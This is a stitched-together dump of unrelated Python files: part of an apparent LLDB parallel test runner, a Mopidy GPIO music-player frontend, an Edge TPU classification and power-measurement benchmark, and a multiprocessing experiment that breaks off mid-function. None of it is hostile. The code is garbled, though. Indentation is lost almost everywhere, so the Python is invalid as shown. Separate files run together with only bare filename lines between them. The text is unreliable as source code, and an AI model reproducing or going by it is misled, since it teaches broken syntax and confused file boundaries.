def inprocess_exec_test_runner(test_work_items, session_dir, runner_context):
# Initialize our global state.
initialize_global_vars_multiprocessing(1, test_work_items, session_dir,
runner_context)
# We're always worker index 0
def get_single_worker_index():
return 0
global GET_WORKER_INDEX
GET_WORKER_INDEX = get_single_worker_index
# Run the listener and related channel maps in a separate thread.
# global RUNNER_PROCESS_ASYNC_MAP
global RESULTS_LISTENER_CHANNEL
if RESULTS_LISTENER_CHANNEL is not None:
socket_thread = threading.Thread(
target=lambda: asyncore_run_loop(RUNNER_PROCESS_ASYNC_MAP))
socket_thread.start()
# Do the work.
test_results = list(map(process_file_mapper_inprocess, test_work_items))
# If we have a listener channel, shut it down here.
if RESULTS_LISTENER_CHANNEL is not None:
# Close down the channel.
RESULTS_LISTENER_CHANNEL.close()
RESULTS_LISTENER_CHANNEL = None
# Wait for the listener and handlers to complete.
socket_thread.join()
return test_results
def walk_and_invoke(test_files, dotest_argv, num_workers, test_runner_func):
"""Invokes the test runner on each test file specified by test_files.
@param test_files a list of (test_file, full_path_to_test_file)
@param num_workers the number of worker queues working on these test files
@param test_runner_func the test runner configured to run the tests
@return a tuple of results from the running of the specified tests,
of the form (timed_out, passed, failed, unexpected_successes, pass_count,
fail_count)
"""
# The async_map is important to keep all thread-related asyncore
# channels distinct when we call asyncore.loop() later on.
global RESULTS_LISTENER_CHANNEL, RUNNER_PROCESS_ASYNC_MAP
RUNNER_PROCESS_ASYNC_MAP = {}
# If we're outputting side-channel test results, create the socket
# listener channel and tell the inferior to send results to the
# port on which we'll be listening.
if RESULTS_FORMATTER is not None:
forwarding_func = RESULTS_FORMATTER.handle_event
RESULTS_LISTENER_CHANNEL = (
dotest_channels.UnpicklingForwardingListenerChannel(
RUNNER_PROCESS_ASYNC_MAP, "localhost", 0,
2 * num_workers, forwarding_func))
# Set the results port command line arg. Might have been
        # inserted previously, so first try to replace.
listener_port = str(RESULTS_LISTENER_CHANNEL.address[1])
try:
port_value_index = dotest_argv.index("--results-port") + 1
dotest_argv[port_value_index] = listener_port
except ValueError:
# --results-port doesn't exist (yet), add it
dotest_argv.append("--results-port")
dotest_argv.append(listener_port)
# Build the test work items out of the (dir, file_list) entries passed in.
test_work_items = []
for test_file in test_files:
test_work_items.append((test_file, dotest_argv, None))
# Convert test work items into test results using whatever
# was provided as the test run function.
test_results = test_runner_func(test_work_items)
# Summarize the results and return to caller.
timed_out = sum([result[0] for result in test_results], [])
passed = sum([result[1] for result in test_results], [])
failed = sum([result[2] for result in test_results], [])
unexpected_successes = sum([result[3] for result in test_results], [])
pass_count = sum([result[4] for result in test_results])
fail_count = sum([result[5] for result in test_results])
return (timed_out, passed, failed, unexpected_successes, pass_count,
fail_count)
def getExpectedTimeouts(platform_name):
# returns a set of test filenames that might timeout
# are we running against a remote target?
# Figure out the target system for which we're collecting
# the set of expected timeout test filenames.
if platform_name is None:
target = sys.platform
else:
m = re.search(r'remote-(\w+)', platform_name)
if m is not None:
target = m.group(1)
else:
target = platform_name
expected_timeout = set()
if target.startswith("freebsd"):
expected_timeout |= {
"TestBreakpointConditions.py",
"TestChangeProcessGroup.py",
"TestValueObjectRecursion.py",
"TestWatchpointConditionAPI.py",
}
return expected_timeout
def getDefaultTimeout(platform_name):
if os.getenv("LLDB_TEST_TIMEOUT"):
return os.getenv("LLDB_TEST_TIMEOUT")
if platform_name is None:
platform_name = sys.platform
if platform_name.startswith("remote-"):
return "10m"
elif platform_name == 'darwin':
# We are consistently needing more time on a few tests.
return "6m"
else:
return "4m"
def touch(fname, times=None):
if os.path.exists(fname):
os.utime(fname, times)
def find(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
def get_test_runner_strategies(num_threads, session_dir, runner_context):
"""Returns the test runner strategies by name in a dictionary.
@param num_threads specifies the number of threads/processes
that will be used for concurrent test runners.
@param session_dir specifies the session dir to use for
auxiliary files.
@param runner_context a dictionary of details on the architectures and
platform used to run the test suite. This is passed along verbatim to
the timeout pre-kill handler, allowing that decoupled component to do
process inspection in a platform-specific way.
@return dictionary with key as test runner strategy name and
value set to a callable object that takes the test work item
and returns a test result tuple.
"""
return {
# multiprocessing supports ctrl-c and does not use
# multiprocessing.Pool.
"multiprocessing":
(lambda work_items: multiprocessing_test_runner(
num_threads, work_items, session_dir, runner_context)),
# multiprocessing-pool uses multiprocessing.Pool but
# does not support Ctrl-C.
"multiprocessing-pool":
(lambda work_items: multiprocessing_test_runner_pool(
num_threads, work_items, session_dir, runner_context)),
# threading uses a hand-rolled worker pool much
# like multiprocessing, but instead uses in-process
# worker threads. This one supports Ctrl-C.
"threading":
(lambda work_items: threading_test_runner(
num_threads, work_items, session_dir, runner_context)),
# threading-pool uses threading for the workers (in-process)
# and uses the multiprocessing.pool thread-enabled pool.
# This does not properly support Ctrl-C.
"threading-pool":
(lambda work_items: threading_test_runner_pool(
num_threads, work_items, session_dir, runner_context)),
# serial uses the subprocess-based, single process
# test runner. This provides process isolation but
# no concurrent test execution.
"serial":
(lambda work_items: inprocess_exec_test_runner(
work_items, session_dir, runner_context))
}
def _remove_option(
args, long_option_name, short_option_name, takes_arg):
"""Removes option and related option arguments from args array.
This method removes all short/long options that match the given
arguments.
@param args the array of command line arguments (in/out)
@param long_option_name the full command line representation of the
long-form option that will be removed (including '--').
@param short_option_name the short version of the command line option
that will be removed (including '-').
@param takes_arg True if the option takes an argument.
"""
if long_option_name is not None:
regex_string = "^" + long_option_name + "="
long_regex = re.compile(regex_string)
if short_option_name is not None:
# Short options we only match the -X and assume
# any arg is one command line argument jammed together.
# i.e. -O--abc=1 is a single argument in the args list.
# We don't handle -O --abc=1, as argparse doesn't handle
# it, either.
regex_string = "^" + short_option_name
short_regex = re.compile(regex_string)
def remove_long_internal():
"""Removes one matching long option from args.
@returns True if one was found and removed; False otherwise.
"""
try:
index = args.index(long_option_name)
# Handle the exact match case.
if takes_arg:
removal_count = 2
else:
removal_count = 1
del args[index:index + removal_count]
return True
except ValueError:
# Thanks to argparse not handling options with known arguments
# like other options parsing libraries (see
# https://bugs.python.org/issue9334), we need to support the
# --results-formatter-options={second-level-arguments} (note
# the equal sign to fool the first-level arguments parser into
# not treating the second-level arguments as first-level
# options). We're certainly at risk of getting this wrong
# since now we're forced into the business of trying to figure
# out what is an argument (although I think this
# implementation will suffice).
for index in range(len(args)):
match = long_regex.search(args[index])
if match:
del args[index]
return True
return False
def remove_short_internal():
"""Removes one matching short option from args.
@returns True if one was found and removed; False otherwise.
"""
for index in range(len(args)):
match = short_regex.search(args[index])
if match:
del args[index]
return True
return False
removal_count = 0
while long_option_name is not None and remove_long_internal():
removal_count += 1
while short_option_name is not None and remove_short_internal():
removal_count += 1
if removal_count == 0:
raise Exception(
"failed to find at least one of '{}', '{}' in options".format(
long_option_name, short_option_name))
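# Illustrative sketch (not part of the original source):
#
#   args = ["--results-port", "12345", "--arch", "x86_64"]
#   _remove_option(args, "--results-port", None, True)
#   # args -> ["--arch", "x86_64"]
#
# Both the flag and its value are removed; "--option=value" and "-Xvalue" forms
# are matched by the regular expressions above instead.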
def adjust_inferior_options(dotest_argv):
"""Adjusts the commandline args array for inferiors.
This method adjusts the inferior dotest commandline options based
on the parallel test runner's options. Some of the inferior options
will need to change to properly handle aggregation functionality.
"""
global dotest_options
# If we don't have a session directory, create one.
if not dotest_options.s:
# no session log directory, we need to add this to prevent
# every dotest invocation from creating its own directory
import datetime
# The windows platforms don't like ':' in the pathname.
timestamp_started = (datetime.datetime.now()
.strftime("%Y-%m-%d-%H_%M_%S"))
dotest_argv.append('-s')
dotest_argv.append(timestamp_started)
dotest_options.s = timestamp_started
# Adjust inferior results formatter options - if the parallel
# test runner is collecting into the user-specified test results,
# we'll have inferiors spawn with the --results-port option and
# strip the original test runner options.
if dotest_options.results_file is not None:
_remove_option(dotest_argv, "--results-file", None, True)
if dotest_options.results_port is not None:
_remove_option(dotest_argv, "--results-port", None, True)
if dotest_options.results_formatter is not None:
_remove_option(dotest_argv, "--results-formatter", None, True)
if dotest_options.results_formatter_options is not None:
_remove_option(dotest_argv, "--results-formatter-option", "-O",
True)
# Remove the --curses shortcut if specified.
if dotest_options.curses:
_remove_option(dotest_argv, "--curses", None, False)
# Remove test runner name if present.
if dotest_options.test_runner_name is not None:
_remove_option(dotest_argv, "--test-runner-name", None, True)
def is_darwin_version_lower_than(target_version):
"""Checks that os is Darwin and version is lower than target_version.
@param target_version the StrictVersion indicating the version
we're checking against.
@return True if the OS is Darwin (OS X) and the version number of
the OS is less than target_version; False in all other cases.
"""
if platform.system() != 'Darwin':
# Can't be Darwin lower than a certain version.
return False
system_version = distutils.version.StrictVersion(platform.mac_ver()[0])
return seven.cmp_(system_version, target_version) < 0
def default_test_runner_name(num_threads):
"""Returns the default test runner name for the configuration.
@param num_threads the number of threads/workers this test runner is
supposed to use.
@return the test runner name that should be used by default when
no test runner was explicitly called out on the command line.
"""
if num_threads == 1:
# Use the serial runner.
test_runner_name = "serial"
elif os.name == "nt":
# On Windows, Python uses CRT with a low limit on the number of open
# files. If you have a lot of cores, the threading-pool runner will
# often fail because it exceeds that limit. It's not clear what the
# right balance is, so until we can investigate it more deeply,
# just use the one that works
test_runner_name = "multiprocessing-pool"
elif is_darwin_version_lower_than(
distutils.version.StrictVersion("10.10.0")):
# OS X versions before 10.10 appear to have an issue using
# the threading test runner. Fall back to multiprocessing.
# Supports Ctrl-C.
test_runner_name = "multiprocessing"
else:
# For everyone else, use the ctrl-c-enabled threading support.
        # Should use fewer system resources than the multiprocessing
# variant.
test_runner_name = "threading"
return test_runner_name
def rerun_tests(test_subdir, tests_for_rerun, dotest_argv, session_dir,
runner_context):
    # Build the list of test files to rerun. At some future time we'll
    # enable re-run by test method so we can constrain the rerun set
    # to just the method(s) that had issues within a file.
# Sort rerun files into subdirectories.
print("\nRerunning the following files:")
rerun_files = []
for test_filename in tests_for_rerun.keys():
# Print the file we'll be rerunning
test_relative_path = os.path.relpath(
test_filename, lldbsuite.lldb_test_root)
print(" {}".format(test_relative_path))
rerun_files.append(test_filename)
# Do not update legacy counts, I am getting rid of
# them so no point adding complicated merge logic here.
rerun_thread_count = 1
# Force the parallel test runner to choose a multi-worker strategy.
rerun_runner_name = default_test_runner_name(rerun_thread_count + 1)
print("rerun will use the '{}' test runner strategy".format(
rerun_runner_name))
runner_strategies_by_name = get_test_runner_strategies(
rerun_thread_count, session_dir, runner_context)
rerun_runner_func = runner_strategies_by_name[
rerun_runner_name]
if rerun_runner_func is None:
raise Exception(
"failed to find rerun test runner "
"function named '{}'".format(rerun_runner_name))
walk_and_invoke(
rerun_files,
dotest_argv,
rerun_thread_count,
rerun_runner_func)
print("\nTest rerun complete\n")
def main(num_threads, test_subdir, test_runner_name, results_formatter):
"""Run dotest.py in inferior mode in parallel.
@param num_threads the parsed value of the num-threads command line
argument.
@param test_subdir optionally specifies a subdir to limit testing
within. May be None if the entire test tree is to be used. This subdir
is assumed to be relative to the lldb/test root of the test hierarchy.
@param test_runner_name if specified, contains the test runner
name which selects the strategy used to run the isolated and
optionally concurrent test runner. Specify None to allow the
system to choose the most appropriate test runner given desired
thread count and OS type.
@param results_formatter if specified, provides the TestResultsFormatter
instance that will format and output test result data from the
side-channel test results. When specified, inferior dotest calls
will send test results side-channel data over a socket to the parallel
test runner, which will forward them on to results_formatter.
"""
# Do not shut down on sighup.
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, signal.SIG_IGN)
dotest_argv = sys.argv[1:]
global RESULTS_FORMATTER
RESULTS_FORMATTER = results_formatter
# We can't use sys.path[0] to determine the script directory
# because it doesn't work under a debugger
parser = dotest_args.create_parser()
global dotest_options
dotest_options = dotest_args.parse_args(parser, dotest_argv)
adjust_inferior_options(dotest_argv)
session_dir = os.path.join(os.getcwd(), dotest_options.s)
    # Determine the test root directory (the directory this script lives in)
test_directory = os.path.dirname(os.path.realpath(__file__))
if test_subdir and len(test_subdir) > 0:
test_subdir = os.path.join(test_directory, test_subdir)
if not os.path.isdir(test_subdir):
print(
'specified test subdirectory {} is not a valid directory\n'
.format(test_subdir))
else:
test_subdir = test_directory
# clean core files in test tree from previous runs (Linux)
cores = find('core.*', test_subdir)
for core in cores:
os.unlink(core)
system_info = " ".join(platform.uname())
# Figure out which test files should be enabled for expected
# timeout
expected_timeout = getExpectedTimeouts(dotest_options.lldb_platform_name)
if results_formatter is not None:
results_formatter.set_expected_timeouts_by_basename(expected_timeout)
# Setup the test runner context. This is a dictionary of information that
# will be passed along to the timeout pre-kill handler and allows for loose
# coupling of its implementation.
runner_context = {
"arch": configuration.arch,
"platform_name": configuration.lldb_platform_name,
"platform_url": configuration.lldb_platform_url,
"platform_working_dir": configuration.lldb_platform_working_dir,
}
# Figure out which testrunner strategy we'll use.
runner_strategies_by_name = get_test_runner_strategies(
num_threads, session_dir, runner_context)
# If the user didn't specify a test runner strategy, determine
# the default now based on number of threads and OS type.
if not test_runner_name:
test_runner_name = default_test_runner_name(num_threads)
if test_runner_name not in runner_strategies_by_name:
raise Exception(
"specified testrunner name '{}' unknown. Valid choices: {}".format(
test_runner_name,
list(runner_strategies_by_name.keys())))
test_runner_func = runner_strategies_by_name[test_runner_name]
# Do the first test run phase.
summary_results = walk_and_invoke(
find_test_files_in_dir_tree(test_subdir),
dotest_argv,
num_threads,
test_runner_func)
(timed_out, passed, failed, unexpected_successes, pass_count,
fail_count) = summary_results
# Check if we have any tests to rerun as phase 2.
if results_formatter is not None:
tests_for_rerun = results_formatter.tests_for_rerun
results_formatter.tests_for_rerun = {}
if tests_for_rerun is not None and len(tests_for_rerun) > 0:
rerun_file_count = len(tests_for_rerun)
print("\n{} test files marked for rerun\n".format(
rerun_file_count))
# Clear errors charged to any of the files of the tests that
# we are rerunning.
# https://llvm.org/bugs/show_bug.cgi?id=27423
results_formatter.clear_file_level_issues(tests_for_rerun,
sys.stdout)
# Check if the number of files exceeds the max cutoff. If so,
# we skip the rerun step.
if rerun_file_count > configuration.rerun_max_file_threshold:
print("Skipping rerun: max rerun file threshold ({}) "
"exceeded".format(
configuration.rerun_max_file_threshold))
else:
rerun_tests(test_subdir, tests_for_rerun, dotest_argv,
session_dir, runner_context)
# The results formatter - if present - is done now. Tell it to
# terminate.
if results_formatter is not None:
results_formatter.send_terminate_as_needed()
timed_out = set(timed_out)
num_test_files = len(passed) + len(failed)
num_test_cases = pass_count + fail_count
# move core files into session dir
cores = find('core.*', test_subdir)
for core in cores:
dst = core.replace(test_directory, "")[1:]
dst = dst.replace(os.path.sep, "-")
os.rename(core, os.path.join(session_dir, dst))
# remove expected timeouts from failures
for xtime in expected_timeout:
if xtime in timed_out:
timed_out.remove(xtime)
failed.remove(xtime)
result = "ExpectedTimeout"
elif xtime in passed:
result = "UnexpectedCompletion"
else:
result = None # failed
if result:
test_name = os.path.splitext(xtime)[0]
touch(os.path.join(session_dir, "{}-{}".format(result, test_name)))
# Only run the old summary logic if we don't have a results formatter
# that already prints the summary.
print_legacy_summary = results_formatter is None
if not print_legacy_summary:
# Print summary results. Summarized results at the end always
# get printed to stdout, even if --results-file specifies a different
# file for, say, xUnit output.
results_formatter.print_results(sys.stdout)
# Figure out exit code by count of test result types.
issue_count = 0
for issue_status in EventBuilder.TESTRUN_ERROR_STATUS_VALUES:
issue_count += results_formatter.counts_by_test_result_status(
issue_status)
# Return with appropriate result code
if issue_count > 0:
sys.exit(1)
else:
sys.exit(0)
else:
# Print the legacy test results summary.
print()
sys.stdout.write("Ran %d test suites" % num_test_files)
if num_test_files > 0:
sys.stdout.write(" (%d failed) (%f%%)" % (
len(failed), 100.0 * len(failed) / num_test_files))
print()
sys.stdout.write("Ran %d test cases" % num_test_cases)
if num_test_cases > 0:
sys.stdout.write(" (%d failed) (%f%%)" % (
fail_count, 100.0 * fail_count / num_test_cases))
print()
exit_code = 0
if len(failed) > 0:
failed.sort()
print("Failing Tests (%d)" % len(failed))
for f in failed:
print("%s: LLDB (suite) :: %s (%s)" % (
"TIMEOUT" if f in timed_out else "FAIL", f, system_info
))
exit_code = 1
if len(unexpected_successes) > 0:
unexpected_successes.sort()
print("\nUnexpected Successes (%d)" % len(unexpected_successes))
for u in unexpected_successes:
print(
"UNEXPECTED SUCCESS: LLDB (suite) :: %s (%s)" %
(u, system_info))
sys.exit(exit_code)
if __name__ == '__main__':
sys.stderr.write(
"error: dosep.py no longer supports being called directly. "
"Please call dotest.py directly. The dosep.py-specific arguments "
"have been added under the Parallel processing arguments.\n")
sys.exit(128)
|
frontend.py
|
import logging
import traceback
import pykka
import time
import threading
from mopidy import core
from .gpio_manager import GPIOManager
from humanfriendly import format_timespan
from RPi import GPIO
from time import sleep
from mpd import MPDClient
logger = logging.getLogger(__name__)
class GpioFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(GpioFrontend, self).__init__()
self.core = core
self.sleep_time = False
self.config = config['hoerbert']
self.gpio_manager = GPIOManager(self, config['hoerbert'])
self.playlists = {}
self.currentPlaylist = -1
self.update_playlists_registry()
self.core.playback.volume = 10
self.volume = 10
# self.gpio_manager.register_rotary_encode(
# 'volume',
# self.config["pin_button_volume_up"],
# self.config["pin_button_volume_down"],
# self.config["volume_steps"]
# )
self.gpio_manager.register_button(self.config["pin_button_play"], 'play', longpress=False)
self.gpio_manager.register_button(self.config["pin_button_sleep"], 'sleep', longpress=False)
for i in range(1, 10):
self.gpio_manager.register_button(
self.config['pin_button_playlist_' + str(i)], "playlist_" + str(i))
self.handle_sleep_timer()
self.volume_handle_thread = StoppableThread(target=self.handle_volume)
self.volume_handle_thread.start()
self.update_volume()
def handle_sleep_timer(self):
self.update_playlists_registry()
        if self.sleep_time is not False:
if self.sleep_time > time.time():
logger.info(format_timespan(self.sleep_time - time.time()) + ' until sleep')
else:
logger.info('going to sleep')
self.sleep_time = False
self.core.playback.pause()
self.sleep_handle_thread = threading.Timer(15, self.handle_sleep_timer)
self.sleep_handle_thread.start()
def update_volume(self):
if self.core.playback.volume.get() != self.volume:
logger.info('updating volume: ' + str(self.volume))
self.core.playback.volume = self.volume
self.update_volume_thread = threading.Timer(0.1, self.update_volume)
self.update_volume_thread.start()
def handle_volume(self):
clk = 4
dt = 17
GPIO.setmode(GPIO.BCM)
GPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_UP)
longWaitCounter = 0
longWaitThreshold = 3
longWaitTime = 0.01
shortWaitTime = 0.0001
volumeSteps = 2
clkLastState = GPIO.input(clk)
try:
while not self.volume_handle_thread.stopped():
clkState = GPIO.input(clk)
dtState = GPIO.input(dt)
if clkState != clkLastState:
volume = self.volume
if dtState != clkState:
volume += volumeSteps
else:
volume -= volumeSteps
if volume > 100:
volume = 100
if volume < 0:
volume = 0
self.volume = volume
longWaitCounter = 0
#logger.info('internal volume: ' + str(self.volume))
clkLastState = clkState
longWaitCounter += 1
if longWaitCounter > (longWaitThreshold / shortWaitTime):
sleep(longWaitTime)
else:
sleep(shortWaitTime)
finally:
GPIO.cleanup()
def update_playlists_registry(self):
for playlist in self.core.playlists.playlists.get():
for i in range(1, 10):
playlist_identifier = 'playlist_' + str(i)
if self.config[playlist_identifier] in playlist.name:
if playlist_identifier not in self.playlists:
logger.info('Playlist found for ' + str(i) + ' Button: ' + playlist.name)
self.playlists[playlist_identifier] = playlist
    def on_failure(self, exception_type, exception_value, traceback):
self.sleep_handle_thread.cancel()
self.update_volume_thread.cancel()
def on_stop(self):
self.sleep_handle_thread.cancel()
self.volume_handle_thread.stop()
self.update_volume_thread.cancel()
def playback_state_changed(self, old_state, new_state):
        # The LED status handling below is currently disabled by this early return.
        return
if new_state == core.PlaybackState.PLAYING:
self.gpio_manager.set_led(True)
else:
self.gpio_manager.set_led(False)
def input(self, input_event):
logger.info(input_event['key'])
try:
if input_event['key'] == 'volume':
current = self.core.playback.volume.get()
current += input_event["value"]
if current > 100:
current = 100
if current < 0:
current = 0
logger.info('Volume: ' + str(current))
self.core.playback.volume = current
elif input_event['key'] == 'sleep':
logger.info('starting sleep timer')
self.sleep_time = time.time() + (self.config['sleep_time'] * 60)
if self.core.playback.state.get() == core.PlaybackState.PAUSED:
logger.info('resuming playback')
self.core.playback.play()
elif input_event['key'] == 'play':
if self.core.playback.state.get() == core.PlaybackState.PLAYING:
logger.info('pausing playback')
self.core.playback.pause()
else:
logger.info('resuming playback')
self.core.playback.play()
            elif input_event['key'] in self.playlists:
playlist = self.playlists[input_event['key']]
if self.currentPlaylist == input_event['key']:
current_track = self.core.playback.get_current_track().get()
if input_event['long']:
for position in self.core.tracklist.get_tl_tracks().get():
if current_track.album.name != position.track.album.name:
                                logger.info('Skipping to next Album in Playlist "' + position.track.name + '"')
self.core.playback.play(tlid=position.tlid)
return
self.core.playback.play(tlid=1)
else:
                        logger.info('Skipping to next Track in Album "' + current_track.album.name + '"')
self.core.playback.next()
else:
                    logger.info('Switching to Playlist "' + playlist.name + '"')
self.currentPlaylist = input_event['key']
self.core.tracklist.clear()
self.core.tracklist.add(playlist.tracks)
self.core.playback.play()
except Exception:
traceback.print_exc()
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
    def __init__(self, *args, **kwargs):
        super(StoppableThread, self).__init__(*args, **kwargs)
        # Use a dedicated event attribute; threading.Thread already defines an
        # internal _stop() method that must not be shadowed.
        self._stop_event = threading.Event()
    def stop(self):
        self._stop_event.set()
    def stopped(self):
        return self._stop_event.is_set()
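# Minimal usage sketch (illustrative, not part of the original frontend.py): the
# target loop must poll `stopped()` itself, exactly as handle_volume() does above.
# The sleep interval and the dict-based closure are assumptions for this demo only.
def _example_stoppable_thread_usage():
    holder = {}
    def _loop():
        while not holder['thread'].stopped():
            sleep(0.1)  # do one small unit of work per pass, then re-check the flag
    holder['thread'] = StoppableThread(target=_loop)
    holder['thread'].start()
    sleep(1)
    holder['thread'].stop()   # request shutdown; the loop exits on its next check
    holder['thread'].join()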
|
classify_tpu_standlone.py
|
# Copyright (c) HP-NTU Digital Manufacturing Corporate Lab, Nanyang Technological University, Singapore.
#
# This source code is licensed under the Apache-2.0 license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from edgetpu.classification.engine import ClassificationEngine
from PIL import Image
import os
import time
from collections import OrderedDict
import numpy as np
import accuracy
import json
import sys
import logging
from power import serialUtil
from multiprocessing import Process
import threading
logger = logging.getLogger()
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
logging.basicConfig(filename="latency_summary.txt", filemode="a", format="%(asctime)s--%(levelname)s--%(message)s", datefmt=DATE_FORMAT)
logger.setLevel(logging.INFO)
alive = True
def cifarnet_preprocessing():
return
def lenet_preprocessing():
return
def get_preprocessing(name):
preprocessing_fn_map = {
'cifarnet': cifarnet_preprocessing,
'inception': inception_preprocessing,
'inception_v1': inception_preprocessing,
'inception_v2': inception_preprocessing,
'inception_v3': inception_preprocessing,
'inception_v4': inception_preprocessing,
'inception_resnet_v2': inception_preprocessing,
'lenet': lenet_preprocessing,
'mobilenet_v1': inception_preprocessing,
'mobilenet_v2': inception_preprocessing,
'mobilenet_v2_035': inception_preprocessing,
'mobilenet_v3_small': inception_preprocessing,
'mobilenet_v3_large': inception_preprocessing,
'mobilenet_v3_small_minimalistic': inception_preprocessing,
'mobilenet_v3_large_minimalistic': inception_preprocessing,
'mobilenet_edgetpu': inception_preprocessing,
'mobilenet_edgetpu_075': inception_preprocessing,
'mobilenet_v2_140': inception_preprocessing,
'nasnet_mobile': inception_preprocessing,
'nasnet_large': inception_preprocessing,
'pnasnet_mobile': inception_preprocessing,
'pnasnet_large': inception_preprocessing,
'resnet_v1_50': vgg_preprocessing,
'resnet_v1_101': vgg_preprocessing,
'resnet_v1_152': vgg_preprocessing,
'resnet_v1_200': vgg_preprocessing,
'resnet_v2_50': vgg_preprocessing,
'resnet_v2_101': vgg_preprocessing,
'resnet_v2_152': vgg_preprocessing,
'resnet_v2_200': vgg_preprocessing,
'vgg': vgg_preprocessing,
'vgg_a': vgg_preprocessing,
'vgg_16': vgg_preprocessing,
'vgg_19': vgg_preprocessing,
'mnasnet_b1': inception_preprocessing
}
return preprocessing_fn_map[name]
def central_crop(image: Image, central_fraction: float):
# image is PIL Image Format
img_h = image.size[1]
img_w = image.size[0]
bbox_h_start = int((1.0 * img_h - img_h * central_fraction) / 2)
bbox_w_start = int((1.0 * img_w - img_w * central_fraction) / 2)
bbox_h_size = img_h - bbox_h_start * 2
bbox_w_size = img_w - bbox_w_start * 2
bbox = (bbox_w_start, bbox_h_start, bbox_w_start + bbox_w_size, bbox_h_start + bbox_h_size)
return image.crop(bbox)
def inception_preprocessing(image: Image, height: int, width: int, central_fraction=0.875):
image = central_crop(image, central_fraction)
if height and width:
image = image.resize((width, height), Image.BILINEAR)
return image
def vgg_preprocessing(image: Image, height: int, width: int, resize_side=256):
img_h = image.size[1]
img_w = image.size[0]
if img_h > img_w:
scale = 1.0 * resize_side / img_w
else:
scale = 1.0 * resize_side / img_h
new_height = int(img_h * scale)
new_width = int(img_w * scale)
image = image.resize((new_width, new_height), Image.BILINEAR)
offset_height = (new_height - height) / 2
offset_width = (new_width - width) / 2
image = image.crop((offset_width, offset_height, offset_width + width, offset_height + height))
return image
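# Illustrative sketch (not part of the original script): how the preprocessing
# dispatch above is applied to a single PIL image before handing it to the TPU
# engine. The file name, model name and the 224x224 input size are assumptions for
# the demo; the real pipeline reads the size from engine.get_input_tensor_shape().
def _example_preprocess_one_image(image_path="example.jpg", model_name="mobilenet_v2"):
    image = Image.open(image_path)
    if image.mode == 'L':
        image = image.convert("RGB")  # the classification engine expects 3-channel input
    preprocess_fn = get_preprocessing(model_name)  # selects inception-style preprocessing here
    return preprocess_fn(image, 224, 224)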
def power():
# Initialize the serial port
su = serialUtil.SerialBlueTooth("/dev/rfcomm0")
su.connect()
# Read the data
with open("power_results.txt", 'w') as wf:
while alive:
wf.write(str(su.read())+'\n')
def main():
global alive
parser = argparse.ArgumentParser()
parser.add_argument('--data', help='Dataset Path', type=str, required=True)
parser.add_argument('--model', help='File path of Tflite model.', type=str, required=True)
parser.add_argument('--number', help='Running number to test.', type=int, required=True)
parser.add_argument('--label', type=str, help="real label path", required=True)
parser.add_argument('--modelname', type=str, help="model name", required=True)
args = parser.parse_args()
# Initialize engine
lm_start = time.time()
engine = ClassificationEngine(args.model)
lm_end = time.time()
input_shape = engine.get_input_tensor_shape()
image_files = {}
i = 0
    # Read the images in a deterministic (sorted) order so it matches the numbering of the original dataset (ImageNet)
    for filett in sorted(os.listdir(args.data)):
        image_files[i] = filett
        i += 1
print("Total {0} images are tested".format(len(image_files)))
ori_total_infer = 0
total_save_time = 0
logger.info("Running " + args.model + " for " + str(args.number) + " begins")
p = threading.Thread(target=power)
p.start()
total_start = time.time()
# Run inference.
with open("temp_result", 'w') as wf:
with open("temp_result_5", 'w') as wf1:
for i in range(args.number):
for key in image_files:
image_t = Image.open(args.data + '/' + image_files[key])
if image_t.mode == 'L':
image_t = image_t.convert("RGB")
# To resize the image
preprocess_t = get_preprocessing(args.modelname)
image_t = preprocess_t(image_t, input_shape[1], input_shape[2])
# Execute the engine
results = engine.classify_with_image(image_t, top_k=1, threshold=1e-10)
# Get the inference time
origin_inf = engine.get_inference_time()
# logger.info("Iteration " + str(i) + " runs " + str(origin_inf) + " ms")
ori_total_infer = ori_total_infer + origin_inf
save_begin = time.time()
for result in results:
wf.write(image_files[key] + ' ' + str(result[0]) + '\n')
results = engine.classify_with_image(image_t, top_k=5, threshold=1e-10)
for result in results:
wf1.write(image_files[key] + ' ' + str(result[0]) + '\n')
save_end = time.time()
total_save_time = total_save_time + save_end - save_begin
end_time = time.time()
alive = False
p.join()
print("Total time taken {0} seconds".format(end_time - total_start))
print("Loading model time taken {0} seconds".format(lm_end - lm_start))
print("Total inference time {0} seconds".format(ori_total_infer/1000))
logger.info("Per image inference runs {0} ms".format(ori_total_infer/args.number))
logger.info("Running " + args.model + " finishes")
with open("power_results.txt", 'r') as rf:
line = rf.readline()
count = 0
temp = 0.0
while line:
line = line.strip()
if line == "None":
line = rf.readline()
continue
else:
count += 1
temp += float(line)
line = rf.readline()
print("Average power is {}".format(temp / count))
# print("Average power is 1.0")
# print("Total save time {0} seconds".format(total_save_time))
print("Top-1 accuracy:", end='')
accuracy.accuracy(args.label, "temp_result", len(image_files))
print("Top-5 accuracy:", end='')
accuracy.accuracy(args.label, "temp_result_5", len(image_files))
if __name__ == '__main__':
main()
|
mp_experiments.py
|
import ctypes, multiprocessing, multiprocessing.sharedctypes, time
from multiprocessing.managers import BaseManager
class MathsClass:
def __init__(self, i):
self.i = i
def add(self, x, y):
return x + y + self.i
def mul(self, x, y):
return x * y + self.i
def set_i(self, i):
self.i = i
def get_i(self):
return self.i
def __call__(self, x):
return self.i + x
class MyManager(BaseManager):
pass
MyManager.register('Maths', MathsClass)
def target(maths):
print('target', maths.get_i())
maths.set_i(5)
time.sleep(0.5)
print('target', maths.get_i())
maths.set_i(23)
time.sleep(1)
print('target', maths.get_i())
def do_it():
with MyManager() as manager:
ctx = multiprocessing.get_context('spawn')
maths = manager.Maths(1)
        process = ctx.Process(target=target, args=(maths,))
        process.start()
time.sleep(0.1)
print('source', maths.get_i())
maths.set_i(2)
time.sleep(1)
print('source', maths.get_i())
maths.set_i(17)
time.sleep(1)
def target2(array):
print('target address', ctypes.addressof(array))
print('target', array[0])
array[0] = 5
time.sleep(0.5)
print('target', array[0])
array[0] = 23
time.sleep(1)
print('target', array[0])
def do_it2():
ctx = multiprocessing.get_context('spawn')
